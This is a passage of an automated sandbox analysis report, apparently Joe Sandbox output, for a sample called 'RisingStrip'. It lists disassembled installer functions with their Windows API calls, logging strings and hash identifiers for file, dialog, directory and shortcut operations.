Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

M, xrefs: 00404B43
N, xrefs: 00404C06
, xrefs: 00404F39
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

A, xrefs: 00404636
82D, xrefs: 004046DB
@%F, xrefs: 00404674
@rD, xrefs: 00404610

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C
GetTTFNameString, xrefs: 00406F07

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
Delete: DeleteFile("%s"), xrefs: 00406DBC
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652262690.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652274967.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652393787.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RisingStrip.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.1652250015.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1652237368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
